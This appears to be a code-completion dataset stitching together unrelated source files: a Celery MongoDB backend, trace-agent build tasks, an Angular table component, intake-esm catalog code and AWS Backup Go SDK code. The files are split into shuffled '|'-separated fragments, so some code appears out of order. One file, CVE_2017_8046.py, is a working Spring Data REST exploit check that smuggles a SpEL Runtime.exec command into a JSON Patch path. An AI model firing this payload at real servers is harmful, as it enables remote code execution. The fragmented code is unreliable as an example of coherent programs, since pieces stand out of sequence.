self._connection = MongoClient(**conf)
return self._connection
def encode(self, data):
if self.serializer == 'bson':
# mongodb handles serialization
return data
payload = super(MongoBackend, self).encode(data)
        # serializers that emit raw binary (pickle/msgpack) must be wrapped
        # in bson.Binary before being stored in MongoDB
if self.serializer in BINARY_CODECS:
payload = Binary(payload)
return payload
def decode(self, data):
if self.serializer == 'bson':
return data
payload = self.encode(data)
return super(MongoBackend, self).decode(payload) | def _store_result(self, task_id, result, state,
traceback=None, request=None, **kwargs):
"""Store return value and state of an executed task."""
meta = self._get_result_meta(result=result, state=state,
traceback=traceback, request=request)
# Add the _id for mongodb
meta['_id'] = task_id
try:
self.collection.replace_one({'_id': task_id}, meta, upsert=True)
except InvalidDocument as exc:
raise EncodeError(exc)
return result
def _get_task_meta_for(self, task_id):
"""Get task meta-data for a task by id."""
obj = self.collection.find_one({'_id': task_id})
if obj:
return self.meta_from_decoded({
'task_id': obj['_id'],
'status': obj['status'],
'result': self.decode(obj['result']),
'date_done': obj['date_done'],
'traceback': self.decode(obj['traceback']),
'children': self.decode(obj['children']),
})
return {'status': states.PENDING, 'result': None}
def _save_group(self, group_id, result):
"""Save the group result."""
meta = {
'_id': group_id,
'result': self.encode([i.id for i in result]),
'date_done': datetime.utcnow(),
}
self.group_collection.replace_one({'_id': group_id}, meta, upsert=True)
return result
def _restore_group(self, group_id):
"""Get the result for a group by id."""
obj = self.group_collection.find_one({'_id': group_id})
if obj:
return {
'task_id': obj['_id'],
'date_done': obj['date_done'],
'result': [
self.app.AsyncResult(task)
for task in self.decode(obj['result'])
],
}
def _delete_group(self, group_id):
"""Delete a group by id."""
self.group_collection.delete_one({'_id': group_id})
def _forget(self, task_id):
"""Remove result from MongoDB.
Raises:
pymongo.exceptions.OperationsError:
if the task_id could not be removed.
"""
# By using safe=True, this will wait until it receives a response from
# the server. Likewise, it will raise an OperationsError if the
# response was unable to be completed.
self.collection.delete_one({'_id': task_id})
def cleanup(self):
"""Delete expired meta-data."""
self.collection.delete_many(
{'date_done': {'$lt': self.app.now() - self.expires_delta}},
)
self.group_collection.delete_many(
{'date_done': {'$lt': self.app.now() - self.expires_delta}},
)
def __reduce__(self, args=(), kwargs=None):
kwargs = {} if not kwargs else kwargs
return super(MongoBackend, self).__reduce__(
args, dict(kwargs, expires=self.expires, url=self.url))
def _get_database(self):
conn = self._get_connection()
db = conn[self.database_name]
if self.user and self.password:
source = self.options.get(
'authsource',
self.database_name or 'admin'
)
if not db.authenticate(self.user, self.password, source=source):
raise ImproperlyConfigured(
'Invalid MongoDB username or password.')
return db
@cached_property
def database(self):
"""Get database from MongoDB connection.
        Performs authentication if necessary.
"""
return self._get_database()
@cached_property
def collection(self):
"""Get the meta-data task collection."""
collection = self.database[self.taskmeta_collection]
# Ensure an index on date_done is there, if not process the index
# in the background. Once completed cleanup will be much faster
collection.create_index('date_done', background=True)
return collection
@cached_property
def group_collection(self):
"""Get the meta-data task collection."""
collection = self.database[self.groupmeta_collection]
# Ensure an index on date_done is there, if not process the index
# in the background. Once completed cleanup will be much faster
collection.create_index('date_done', background=True)
return collection
@cached_property
def expires_delta(self):
return timedelta(seconds=self.expires)
def as_uri(self, include_password=False):
"""Return the backend as an URI.
Arguments:
include_password (bool): Password censored if disabled.
"""
if not self.url:
return 'mongodb://'
if include_password:
return self.url
if ',' not in self.url:
return maybe_sanitize_url(self.url)
uri1, remainder = self.url.split(',', 1)
return ','.join([maybe_sanitize_url(uri1), remainder]) | |
trace_agent.py | import os
import sys
import shutil
import invoke
from invoke import task
from .utils import bin_name, get_build_flags, get_version_numeric_only, load_release_versions
from .utils import REPO_PATH
from .build_tags import get_build_tags, get_default_build_tags, LINUX_ONLY_TAGS, REDHAT_AND_DEBIAN_ONLY_TAGS, REDHAT_AND_DEBIAN_DIST
from .go import deps
BIN_PATH = os.path.join(".", "bin", "trace-agent")
DEFAULT_BUILD_TAGS = [
"netcgo",
"secrets",
"docker",
"kubeapiserver",
"kubelet",
]
@task
def build(ctx, rebuild=False, race=False, precompile_only=False, build_include=None,
build_exclude=None, major_version='7', python_runtimes='3', arch="x64"):
"""
Build the trace agent.
"""
# get env prior to windows sources so we only have to set the target architecture once
ldflags, gcflags, env = get_build_flags(ctx, arch=arch, major_version=major_version, python_runtimes=python_runtimes)
# generate windows resources
if sys.platform == 'win32':
windres_target = "pe-x86-64"
if arch == "x86":
env["GOARCH"] = "386"
windres_target = "pe-i386"
ver = get_version_numeric_only(ctx, env, major_version=major_version)
maj_ver, min_ver, patch_ver = ver.split(".")
ctx.run("windmc --target {target_arch} -r cmd/trace-agent/windows_resources cmd/trace-agent/windows_resources/trace-agent-msg.mc".format(target_arch=windres_target))
ctx.run("windres --define MAJ_VER={maj_ver} --define MIN_VER={min_ver} --define PATCH_VER={patch_ver} -i cmd/trace-agent/windows_resources/trace-agent.rc --target {target_arch} -O coff -o cmd/trace-agent/rsrc.syso".format(
maj_ver=maj_ver,
min_ver=min_ver,
patch_ver=patch_ver,
target_arch=windres_target
))
build_include = DEFAULT_BUILD_TAGS if build_include is None else build_include.split(",")
build_exclude = [] if build_exclude is None else build_exclude.split(",")
if not sys.platform.startswith('linux'):
for ex in LINUX_ONLY_TAGS:
if ex not in build_exclude:
build_exclude.append(ex)
build_tags = get_build_tags(build_include, build_exclude)
cmd = "go build {race_opt} {build_type} -tags \"{go_build_tags}\" "
cmd += "-o {agent_bin} -gcflags=\"{gcflags}\" -ldflags=\"{ldflags}\" {REPO_PATH}/cmd/trace-agent"
args = {
"race_opt": "-race" if race else "",
"build_type": "-a" if rebuild else ("-i" if precompile_only else ""),
"go_build_tags": " ".join(build_tags),
"agent_bin": os.path.join(BIN_PATH, bin_name("trace-agent", android=False)),
"gcflags": gcflags,
"ldflags": ldflags,
"REPO_PATH": REPO_PATH,
}
ctx.run("go generate {REPO_PATH}/pkg/trace/info".format(**args), env=env)
ctx.run(cmd.format(**args), env=env)
@task
def integration_tests(ctx, install_deps=False, race=False, remote_docker=False):
"""
Run integration tests for trace agent
"""
if install_deps:
deps(ctx)
test_args = {
"go_build_tags": " ".join(get_default_build_tags()),
"race_opt": "-race" if race else "",
"exec_opts": "",
}
if remote_docker:
test_args["exec_opts"] = "-exec \"inv docker.dockerize-test\""
go_cmd = 'INTEGRATION=yes go test {race_opt} -v'.format(**test_args)
prefixes = [
"./pkg/trace/test/testsuite/...",
]
for prefix in prefixes:
ctx.run("{} {}".format(go_cmd, prefix))
@task
def cross_compile(ctx, tag=""):
"""
Cross-compiles the trace-agent binaries. Use the "--tag=X" argument to specify build tag.
"""
if not tag:
print("Argument --tag=<version> is required.")
return
print("Building tag %s..." % tag)
env = { | ctx.run("git checkout $V", env=env)
ctx.run("mkdir -p ./bin/trace-agent/$V", env=env)
ctx.run("go generate ./pkg/trace/info", env=env)
ctx.run("go get -u github.com/karalabe/xgo")
ctx.run("xgo -dest=bin/trace-agent/$V -go=1.11 -out=trace-agent-$V -targets=windows-6.1/amd64,linux/amd64,darwin-10.11/amd64 ./cmd/trace-agent", env=env)
ctx.run("mv ./bin/trace-agent/$V/trace-agent-$V-windows-6.1-amd64.exe ./bin/trace-agent/$V/trace-agent-$V-windows-amd64.exe", env=env)
ctx.run("mv ./bin/trace-agent/$V/trace-agent-$V-darwin-10.11-amd64 ./bin/trace-agent/$V/trace-agent-$V-darwin-amd64 ", env=env)
ctx.run("git checkout -")
print("Done! Binaries are located in ./bin/trace-agent/%s" % tag) | "TRACE_AGENT_VERSION": tag,
"V": tag,
}
|
app.component.ts | import {Component, ViewChild} from '@angular/core';
import {ActivatedRoute} from '@angular/router';
import {CooTableConfig} from '../../../src/model/coo-table-config.model';
import {CooTableService} from './modules/table/coo-table.service';
import {Listing} from './modules/table/model/listing';
import {ListingMetadata} from './modules/table/model/listing-metadata';
import {ListingParameters} from './modules/table/model/listing-query-params.model';
import {CooTableFilterEvent} from './modules/table/plugins/coo-table-filters/coo-table-filter.event';
import {CooTablePagerEvent} from './modules/table/plugins/coo-table-pager/coo-table-pager.event';
import {CooTableRowSelectEvent} from './modules/table/plugins/coo-table-rowselect/coo-table-rowselect.event';
import {CooTableSearchEvent} from './modules/table/plugins/coo-table-search/coo-table-search.event';
import {CooTableSorterEvent} from './modules/table/plugins/coo-table-sorter/coo-table-sorter.event';
import {Wine} from './wines/wine';
import {WineService} from './wines/wine.service';
@Component({ selector : '', templateUrl : './app.component.html', styleUrls : [ './app.component.css' ], providers : [ CooTableService ] })
export class AppComponent {
metadata: ListingMetadata;
limit: number = 10;
rows: Array<Wine> = [];
public update = false;
private _doubleClicked: Array<any> = [];
constructor(private cooTableService: CooTableService, private wineService: WineService, private _activeRoute: ActivatedRoute, private _queryParams: ListingParameters,
cooTableConfig: CooTableConfig) {
cooTableConfig.routeChange = true;
this._queryParams.limit = this.limit;
this._queryParams.page = 1;
wineService.getAllWines(this._queryParams).subscribe((listingResult: Listing<Wine>) => {
this.metadata = listingResult.metadata;
this.rows = listingResult.results;
const querySubscription = _activeRoute.queryParams.subscribe(data => {
console.log(data);
if (data.page) {
this._queryParams.page = data.page;
}
// querySubscription.unsubscribe();
if (data.sort && data.columName && !data.search && !data.filter) {
// Only Sort
this._queryParams.sort = data.sort;
this._queryParams.sortColumn = data.columName;
wineService.sortWines(this._queryParams, data.columName).subscribe((listingResult: Listing<Wine>) => {
this.metadata = listingResult.metadata;
this.rows = listingResult.results;
});
} else if (data.search && !data.filter) {
this._queryParams.sort = data.sort;
this._queryParams.sortColumn = data.columName;
this._queryParams.filter = data.search;
this.wineService.filterAllColumns(this._queryParams).subscribe((listingResult: Listing<Wine>) => {
this.metadata = listingResult.metadata;
this.rows = listingResult.results;
});
} else if (!data.search && data.filter) {
this._queryParams.sort = data.sort;
this._queryParams.sortColumn = data.columName;
const filterJSON = JSON.parse(data.filter);
for (const i in filterJSON) {
console.log(filterJSON[i]);
this._queryParams.attributeFilters.set(filterJSON[i]['column'], filterJSON[i]['filterValue']);
}
this.wineService.filterWines(this._queryParams).subscribe((listingResult: Listing<Wine>) => {
this.metadata = listingResult.metadata;
this.rows = listingResult.results;
});
}
});
querySubscription.unsubscribe();
});
}
onClick(column) {
// This example shows how to handle both a single click and a double click on the same row.
// The idea is to collect each click's timeout handle in an array and clear them all when a double click fires.
// Adjust the timeout duration to your needs.
const timeout = setTimeout(() => {
let selectRow: boolean = true;
if (this.cooTableService.getSelectedRows().get(column.id)) {
selectRow = false;
}
this.cooTableService.selectRow(new CooTableRowSelectEvent(column.id, selectRow, column));
this.update = !this.update;
}, 200);
this._doubleClicked.push(timeout);
}
onDoubleClick(row) {
this._doubleClicked.forEach((doubleClicks) => {
clearTimeout(doubleClicks);
});
alert('Detail view for: ' + row.id);
// this.jTableService.cellDoubleClicked(row); | onTableChanged() {
}
filterTable(event: CooTableFilterEvent) {
console.log('Filter: ', event);
this._queryParams.attributeFilters.set(event.column, event.value);
if (event.value === '' || !event.value) {
this._queryParams.attributeFilters.delete(event.column);
}
this._queryParams.page = 1;
this.wineService.filterWines(this._queryParams).subscribe((listingResult: Listing<Wine>) => {
this.metadata = listingResult.metadata;
this.rows = listingResult.results;
});
}
sortTable(event: CooTableSorterEvent) {
console.log('Sort:', event);
this._queryParams.sort = event.sort;
this._queryParams.sortColumn = event.field;
this.wineService.sortWines(this._queryParams, event.field).subscribe((listingResult: Listing<Wine>) => {
this.metadata = listingResult.metadata;
this.rows = listingResult.results;
});
}
/**
* On Search we will filter with or on any possible column
*/
onSearch(event: CooTableSearchEvent): void {
console.log(event);
this._queryParams.filter = event.value;
this._queryParams.attributeFilters.clear();
this._queryParams.page = 1;
this.wineService.filterAllColumns(this._queryParams).subscribe((listingResult: Listing<Wine>) => {
this.metadata = listingResult.metadata;
this.rows = listingResult.results;
});
}
public loadPage(event: CooTablePagerEvent) {
this._queryParams.limit = this.limit;
this._queryParams.page = event.page;
this.wineService.getAllWines(this._queryParams).subscribe((listingResult: Listing<Wine>) => {
this.metadata = listingResult.metadata;
this.rows = listingResult.results;
});
}
public onAllSelect(event: string): void {
if (event === 'UPDATE::SELECTED') {
this.update = !this.update;
}
}
} | }
|
CVE_2017_8046.py | #!/usr/bin/env python3
import json
from app.lib.utils.request import request
from app.lib.utils.common import get_useragent
class CVE_2017_8046_BaseVerify:
def __init__(self, url):
self.info = {
'name': 'CVE-2017-8046 vulnerability',
'description': 'CVE-2017-8046 allows arbitrary command execution. The command executed is /usr/bin/touch ./test.jsp, converted to ASCII (using the Xiaokui converter) as 47,117,115,114,47,98,105,110,47,116,111,117,99,104,32,46,47,116,101,115,116,46,106,115,112. Affected range: Spring Data REST versions prior to 2.6.9 (Ingalls SR9) and versions prior to 3.0.1 (Kay SR1)',
'date': '2017-04-21',
'exptype': 'check',
'type': 'RCE'
}
self.url = url
# startswith("http") already covers "https", so a single check suffices
if not self.url.startswith("http"):
self.url = "http://" + self.url
self.headers1 = {
"User-Agent": get_useragent(),
"Content-Type": "application/json",
"Cache-Control": "no-cache"
}
self.headers2 = {
"User-Agent": get_useragent(),
"Content-Type": "application/json-patch+json",
"Cache-Control": "no-cache"
}
self.data1 = {
"firstName": "VulApps",
"lastName": "VulApps"
}
self.data2 = [{ "op": "replace", "path": "T(java.lang.Runtime).getRuntime().exec(new java.lang.String(new byte[]{47,117,115,114,47,98,105,110,47,116,111,117,99,104,32,46,47,116,101,115,116,46,106,115,112}))/lastName", "value": "vulapps-demo" }]
def check(self): | """
Check whether the target is vulnerable.
:return bool: True if the vulnerability exists, False otherwise
"""
try:
# Create a Customer record, then send a JSON Patch whose "path" smuggles a SpEL expression
response1 = request.post(self.url + '/customers', headers=self.headers1, data=json.dumps(self.data1))
response2 = request.patch(self.url + '/customers/1', headers=self.headers2, data=json.dumps(self.data2))
# A vulnerable server evaluates the SpEL expression; its error response contains this marker
return 'maybe not public' in response2.text
except Exception as e:
print(e)
return False
if __name__ == '__main__':
CVE_2017_8046 = CVE_2017_8046_BaseVerify('http://192.168.30.242:8086')
CVE_2017_8046.check() | |
cat.py | import enum
import json
import os
import pathlib
import typing
import fsspec
import pandas as pd
import pydantic
import tlz
from ._search import search, search_apply_require_all_on
class AggregationType(str, enum.Enum):
join_new = 'join_new'
join_existing = 'join_existing'
union = 'union'
class Config:
validate_all = True
validate_assignment = True
class DataFormat(str, enum.Enum):
netcdf = 'netcdf'
zarr = 'zarr'
class Config:
validate_all = True
validate_assignment = True
class Attribute(pydantic.BaseModel):
column_name: pydantic.StrictStr
vocabulary: pydantic.StrictStr = ''
class Config:
validate_all = True
validate_assignment = True
class Assets(pydantic.BaseModel):
column_name: pydantic.StrictStr
format: DataFormat
format_column_name: typing.Optional[pydantic.StrictStr]
class Config:
validate_all = True
validate_assignment = True
@pydantic.root_validator
def _validate_data_format(cls, values):
data_format, format_column_name = values.get('format'), values.get('format_column_name')
if data_format is not None and format_column_name is not None:
raise ValueError('Cannot set both format and format_column_name')
return values
class Aggregation(pydantic.BaseModel):
type: AggregationType
attribute_name: pydantic.StrictStr
options: typing.Optional[typing.Dict] = {}
class Config:
validate_all = True
validate_assignment = True
class AggregationControl(pydantic.BaseModel):
variable_column_name: pydantic.StrictStr
groupby_attrs: typing.List[pydantic.StrictStr]
aggregations: typing.List[Aggregation] = []
class Config:
validate_all = True
validate_assignment = True
class ESMCatalogModel(pydantic.BaseModel):
"""
Pydantic model for the ESM data catalog defined in https://git.io/JBWoW
"""
esmcat_version: pydantic.StrictStr
id: str
attributes: typing.List[Attribute]
assets: Assets
aggregation_control: AggregationControl
catalog_dict: typing.Optional[typing.List[typing.Dict]] = None
catalog_file: pydantic.StrictStr = None
description: pydantic.StrictStr = None
title: pydantic.StrictStr = None
_df: typing.Optional[typing.Any] = pydantic.PrivateAttr()
class Config:
validate_all = True
validate_assignment = True
@pydantic.root_validator
def validate_catalog(cls, values):
catalog_dict, catalog_file = values.get('catalog_dict'), values.get('catalog_file')
if catalog_dict is not None and catalog_file is not None:
raise ValueError('catalog_dict and catalog_file cannot be set at the same time')
return values
@classmethod
def from_dict(cls, data: typing.Dict) -> 'ESMCatalogModel':
esmcat = data['esmcat']
df = data['df']
cat = cls.parse_obj(esmcat)
cat._df = df
return cat
def save(self, name: str, *, directory: str = None, catalog_type: str = 'dict') -> None:
"""
Save the catalog to a file.
Parameters
-----------
name: str
The name of the file to save the catalog to.
directory: str
The directory to save the catalog to. If None, use the current directory
catalog_type: str
The type of catalog to save. Whether to save the catalog table as a dictionary
in the JSON file or as a separate CSV file. Valid options are 'dict' and 'file'.
Notes
-----
Large catalogs can result in large JSON files. To keep the JSON file size manageable, call with
`catalog_type='file'` to save catalog as a separate CSV file.
"""
if catalog_type not in {'file', 'dict'}:
raise ValueError(
f'catalog_type must be either "dict" or "file". Received catalog_type={catalog_type}'
)
csv_file_name = pathlib.Path(f'{name}.csv.gz')
json_file_name = pathlib.Path(f'{name}.json')
if directory:
directory = pathlib.Path(directory)
directory.mkdir(parents=True, exist_ok=True)
csv_file_name = directory / csv_file_name
json_file_name = directory / json_file_name
data = self.dict().copy()
for key in {'catalog_dict', 'catalog_file'}:
data.pop(key, None)
data['id'] = name
if catalog_type == 'file':
data['catalog_file'] = str(csv_file_name)
self.df.to_csv(csv_file_name, compression='gzip', index=False)
else:
data['catalog_dict'] = self.df.to_dict(orient='records')
with open(json_file_name, 'w') as outfile:
json.dump(data, outfile, indent=2)
print(f'Successfully wrote ESM collection json file to: {json_file_name}')
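# Illustrative usage sketch for save(); `cat` is assumed to be an existing
# ESMCatalogModel instance and the name/directory below are hypothetical:
# cat.save('my-catalog', directory='./catalogs', catalog_type='file')
# # -> writes ./catalogs/my-catalog.json plus ./catalogs/my-catalog.csv.gz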
@classmethod
def load(
cls,
json_file: typing.Union[str, pydantic.FilePath, pydantic.AnyUrl],
storage_options: typing.Dict[str, typing.Any] = None,
read_csv_kwargs: typing.Dict[str, typing.Any] = None,
) -> 'ESMCatalogModel':
"""
Loads the catalog from a file
"""
storage_options = storage_options if storage_options is not None else {}
read_csv_kwargs = read_csv_kwargs or {}
_mapper = fsspec.get_mapper(json_file, **storage_options)
with fsspec.open(json_file, **storage_options) as fobj:
cat = cls.parse_raw(fobj.read())
if cat.catalog_file:
if _mapper.fs.exists(cat.catalog_file):
csv_path = cat.catalog_file
else:
csv_path = f'{os.path.dirname(_mapper.root)}/{cat.catalog_file}'
cat.catalog_file = csv_path
df = pd.read_csv(
cat.catalog_file,
storage_options=storage_options,
**read_csv_kwargs,
)
else:
df = pd.DataFrame(cat.catalog_dict)
cat._df = df
cat._cast_agg_columns_with_iterables()
return cat
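# Illustrative usage sketch for load(); the URL and storage options below are
# hypothetical (any fsspec-compatible path should work):
# cat = ESMCatalogModel.load('s3://bucket/catalog.json', storage_options={'anon': True})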
@property
def columns_with_iterables(self) -> typing.Set[str]:
"""Return a set of columns that have iterables."""
if self._df.empty:
return set()
# Sample up to 20 rows (with replacement, so this also works for small
# frames) and flag any column whose cells are lists, tuples, or sets
has_iterables = (
self._df.sample(20, replace=True)
.applymap(type)
.isin([list, tuple, set])
.any()
.to_dict()
)
return {column for column, check in has_iterables.items() if check}
@property
def has_multiple_variable_assets(self) -> bool:
"""Return True if the catalog has multiple variable assets."""
return self.aggregation_control.variable_column_name in self.columns_with_iterables
@property
def df(self) -> pd.DataFrame:
"""Return the dataframe."""
return self._df
@df.setter
def df(self, value: pd.DataFrame) -> None:
self._df = value
def _cast_agg_columns_with_iterables(self) -> None:
"""Cast all agg_columns with iterables to tuple values so as
to avoid hashing issues (e.g. TypeError: unhashable type: 'list')
"""
columns = list(
self.columns_with_iterables.intersection(
set(map(lambda agg: agg.attribute_name, self.aggregation_control.aggregations))
)
)
if columns:
self._df[columns] = self._df[columns].apply(tuple)
@property
def grouped(self) -> typing.Union[pd.core.groupby.DataFrameGroupBy, pd.DataFrame]:
if self.aggregation_control.groupby_attrs and set(
self.aggregation_control.groupby_attrs
) != set(self.df.columns):
return self.df.groupby(self.aggregation_control.groupby_attrs)
return self.df
def _construct_group_keys(
self, sep: str = '.'
) -> typing.Dict[str, typing.Union[str, typing.Tuple[str]]]:
grouped = self.grouped
if isinstance(grouped, pd.core.groupby.generic.DataFrameGroupBy):
internal_keys = grouped.groups.keys()
public_keys = map(
lambda key: key if isinstance(key, str) else sep.join(str(value) for value in key),
internal_keys,
)
else:
internal_keys = grouped.index
public_keys = (
grouped[grouped.columns.tolist()]
.apply(lambda row: sep.join(str(v) for v in row), axis=1)
.tolist()
)
return dict(zip(public_keys, internal_keys))
def _unique(self) -> typing.Dict:
def _find_unique(series):
values = series.dropna()
if series.name in self.columns_with_iterables:
|
return list(tlz.unique(values))
data = self.df[self.df.columns]
if data.empty:
return {col: [] for col in self.df.columns}
else:
return data.apply(_find_unique, result_type='reduce').to_dict()
def unique(self) -> pd.Series:
return pd.Series(self._unique())
def nunique(self) -> pd.Series:
return pd.Series(tlz.valmap(len, self._unique()))
def search(
self,
*,
query: typing.Union['QueryModel', typing.Dict[str, typing.Any]],
require_all_on: typing.Union[str, typing.List[str]] = None,
) -> 'ESMCatalogModel':
"""
Search for entries in the catalog.
Parameters
----------
query: dict, optional
A dictionary of query parameters to execute against the dataframe.
require_all_on : list, str, optional
A dataframe column or a list of dataframe columns across
which all entries must satisfy the query criteria.
If None, return entries that fulfill any of the criteria specified
in the query, by default None.
"""
if not isinstance(query, QueryModel):
_query = QueryModel(
query=query, require_all_on=require_all_on, columns=self.df.columns.tolist()
)
else:
_query = query
results = search(
df=self.df, query=_query.query, columns_with_iterables=self.columns_with_iterables
)
if _query.require_all_on is not None and not results.empty:
results = search_apply_require_all_on(
df=results, query=_query.query, require_all_on=_query.require_all_on
)
return results
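# Illustrative usage sketch for search(); the column names are hypothetical.
# Scalar query values are wrapped into single-element lists by QueryModel below:
# subset = cat.search(
#     query={'variable_id': ['tas', 'pr'], 'experiment_id': 'historical'},
#     require_all_on='source_id',
# )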
class QueryModel(pydantic.BaseModel):
query: typing.Dict[pydantic.StrictStr, typing.Union[typing.Any, typing.List[typing.Any]]]
columns: typing.List[str]
require_all_on: typing.Union[str, typing.List[typing.Any]] = None
class Config:
validate_all = True
validate_assignment = True
@pydantic.root_validator(pre=False)
def validate_query(cls, values):
query = values.get('query', {})
columns = values.get('columns')
require_all_on = values.get('require_all_on', [])
if query:
for key in query:
if key not in columns:
raise ValueError(f'Column {key} not in columns {columns}')
if isinstance(require_all_on, str):
values['require_all_on'] = [require_all_on]
if require_all_on is not None:
for key in values['require_all_on']:
if key not in columns:
raise ValueError(f'Column {key} not in columns {columns}')
_query = query.copy()
for key, value in _query.items():
if isinstance(value, (str, int, float, bool)):
_query[key] = [value]
values['query'] = _query
return values
| values = tlz.concat(values) |
api.go | // Code generated by private/model/cli/gen-api/main.go. DO NOT EDIT.
package backup
import (
"fmt"
"time"
"github.com/ClearcodeHQ/aws-sdk-go/aws"
"github.com/ClearcodeHQ/aws-sdk-go/aws/awsutil"
"github.com/ClearcodeHQ/aws-sdk-go/aws/request"
"github.com/ClearcodeHQ/aws-sdk-go/private/protocol"
"github.com/ClearcodeHQ/aws-sdk-go/private/protocol/restjson"
)
const opCreateBackupPlan = "CreateBackupPlan"
// CreateBackupPlanRequest generates a "aws/request.Request" representing the
// client's request for the CreateBackupPlan operation. The "output" return
// value will be populated with the request's response once the request completes
// successfully.
//
// Use "Send" method on the returned Request to send the API call to the service.
// the "output" return value is not valid until after Send returns without error.
//
// See CreateBackupPlan for more information on using the CreateBackupPlan
// API call, and error handling.
//
// This method is useful when you want to inject custom logic or configuration
// into the SDK's request lifecycle, such as custom headers or retry logic.
//
//
// // Example sending a request using the CreateBackupPlanRequest method.
// req, resp := client.CreateBackupPlanRequest(params)
//
// err := req.Send()
// if err == nil { // resp is now filled
// fmt.Println(resp)
// }
//
// See also, https://docs.aws.amazon.com/goto/WebAPI/backup-2018-11-15/CreateBackupPlan
func (c *Backup) CreateBackupPlanRequest(input *CreateBackupPlanInput) (req *request.Request, output *CreateBackupPlanOutput) {
op := &request.Operation{
Name: opCreateBackupPlan,
HTTPMethod: "PUT",
HTTPPath: "/backup/plans/",
}
if input == nil {
input = &CreateBackupPlanInput{}
}
output = &CreateBackupPlanOutput{}
req = c.newRequest(op, input, output)
return
}
// CreateBackupPlan API operation for AWS Backup.
//
// Creates a backup plan using a backup plan name and backup rules. A backup
// plan is a document that contains information that AWS Backup uses to schedule
// tasks that create recovery points for resources.
//
// If you call CreateBackupPlan with a plan that already exists, an AlreadyExistsException
// is returned.
//
// Returns awserr.Error for service API and SDK errors. Use runtime type assertions
// with awserr.Error's Code and Message methods to get detailed information about
// the error.
//
// See the AWS API reference guide for AWS Backup's
// API operation CreateBackupPlan for usage and error information.
//
// Returned Error Types:
// * LimitExceededException
// A limit in the request has been exceeded; for example, a maximum number of
// items allowed in a request.
//
// * AlreadyExistsException
// The required resource already exists.
//
// * InvalidParameterValueException
// Indicates that something is wrong with a parameter's value. For example,
// the value is out of range.
//
// * MissingParameterValueException
// Indicates that a required parameter is missing.
//
// * ServiceUnavailableException
// The request failed due to a temporary failure of the server.
//
// See also, https://docs.aws.amazon.com/goto/WebAPI/backup-2018-11-15/CreateBackupPlan
func (c *Backup) CreateBackupPlan(input *CreateBackupPlanInput) (*CreateBackupPlanOutput, error) {
req, out := c.CreateBackupPlanRequest(input)
return out, req.Send()
}
// CreateBackupPlanWithContext is the same as CreateBackupPlan with the addition of
// the ability to pass a context and additional request options.
//
// See CreateBackupPlan for details on how to use this API operation.
//
// The context must be non-nil and will be used for request cancellation. If
// the context is nil a panic will occur. In the future the SDK may create
// sub-contexts for http.Requests. See https://golang.org/pkg/context/
// for more information on using Contexts.
func (c *Backup) CreateBackupPlanWithContext(ctx aws.Context, input *CreateBackupPlanInput, opts ...request.Option) (*CreateBackupPlanOutput, error) {
req, out := c.CreateBackupPlanRequest(input)
req.SetContext(ctx)
req.ApplyOptions(opts...)
return out, req.Send()
}
const opCreateBackupSelection = "CreateBackupSelection"
// CreateBackupSelectionRequest generates a "aws/request.Request" representing the
// client's request for the CreateBackupSelection operation. The "output" return
// value will be populated with the request's response once the request completes
// successfully.
//
// Use "Send" method on the returned Request to send the API call to the service.
// the "output" return value is not valid until after Send returns without error.
//
// See CreateBackupSelection for more information on using the CreateBackupSelection
// API call, and error handling.
//
// This method is useful when you want to inject custom logic or configuration
// into the SDK's request lifecycle, such as custom headers or retry logic.
//
//
// // Example sending a request using the CreateBackupSelectionRequest method.
// req, resp := client.CreateBackupSelectionRequest(params)
//
// err := req.Send()
// if err == nil { // resp is now filled
// fmt.Println(resp)
// }
//
// See also, https://docs.aws.amazon.com/goto/WebAPI/backup-2018-11-15/CreateBackupSelection
func (c *Backup) CreateBackupSelectionRequest(input *CreateBackupSelectionInput) (req *request.Request, output *CreateBackupSelectionOutput) {
op := &request.Operation{
Name: opCreateBackupSelection,
HTTPMethod: "PUT",
HTTPPath: "/backup/plans/{backupPlanId}/selections/",
}
if input == nil {
input = &CreateBackupSelectionInput{}
}
output = &CreateBackupSelectionOutput{}
req = c.newRequest(op, input, output)
return
}
// CreateBackupSelection API operation for AWS Backup.
//
// Creates a JSON document that specifies a set of resources to assign to a
// backup plan. Resources can be included by specifying patterns for a ListOfTags
// and selected Resources.
//
// For example, consider the following patterns:
//
// * Resources: "arn:aws:ec2:region:account-id:volume/volume-id"
//
// * ConditionKey:"department" ConditionValue:"finance" ConditionType:"StringEquals"
//
// * ConditionKey:"importance" ConditionValue:"critical" ConditionType:"StringEquals"
//
// Using these patterns would back up all Amazon Elastic Block Store (Amazon
// EBS) volumes that are tagged as "department=finance", "importance=critical",
// in addition to an EBS volume with the specified volume ID.
//
// Resources and conditions are additive in that all resources that match the
// pattern are selected. This shouldn't be confused with a logical AND, where
// all conditions must match. The matching patterns are logically put together
// using the OR operator. In other words, all patterns that match are selected
// for backup.
//
// Returns awserr.Error for service API and SDK errors. Use runtime type assertions
// with awserr.Error's Code and Message methods to get detailed information about
// the error.
//
// See the AWS API reference guide for AWS Backup's
// API operation CreateBackupSelection for usage and error information.
//
// Returned Error Types:
// * LimitExceededException
// A limit in the request has been exceeded; for example, a maximum number of
// items allowed in a request.
//
// * AlreadyExistsException
// The required resource already exists.
//
// * InvalidParameterValueException
// Indicates that something is wrong with a parameter's value. For example,
// the value is out of range.
//
// * MissingParameterValueException
// Indicates that a required parameter is missing.
//
// * ServiceUnavailableException
// The request failed due to a temporary failure of the server.
//
// See also, https://docs.aws.amazon.com/goto/WebAPI/backup-2018-11-15/CreateBackupSelection
func (c *Backup) CreateBackupSelection(input *CreateBackupSelectionInput) (*CreateBackupSelectionOutput, error) {
req, out := c.CreateBackupSelectionRequest(input)
return out, req.Send()
}
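// A minimal illustrative sketch of the tag-condition pattern described above.
// The plan ID, role ARN, selection name, and `svc` client variable are
// hypothetical placeholders; field names follow this package's
// CreateBackupSelectionInput, Selection, and Condition types:
//
//    input := &CreateBackupSelectionInput{
//        BackupPlanId: aws.String("plan-id"),
//        BackupSelection: &Selection{
//            SelectionName: aws.String("finance-critical"),
//            IamRoleArn:    aws.String("arn:aws:iam::account-id:role/backup-role"),
//            ListOfTags: []*Condition{
//                {
//                    ConditionKey:   aws.String("department"),
//                    ConditionType:  aws.String("StringEquals"),
//                    ConditionValue: aws.String("finance"),
//                },
//            },
//        },
//    }
//    out, err := svc.CreateBackupSelection(input)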
// CreateBackupSelectionWithContext is the same as CreateBackupSelection with the addition of
// the ability to pass a context and additional request options.
//
// See CreateBackupSelection for details on how to use this API operation.
//
// The context must be non-nil and will be used for request cancellation. If
// the context is nil a panic will occur. In the future the SDK may create
// sub-contexts for http.Requests. See https://golang.org/pkg/context/
// for more information on using Contexts.
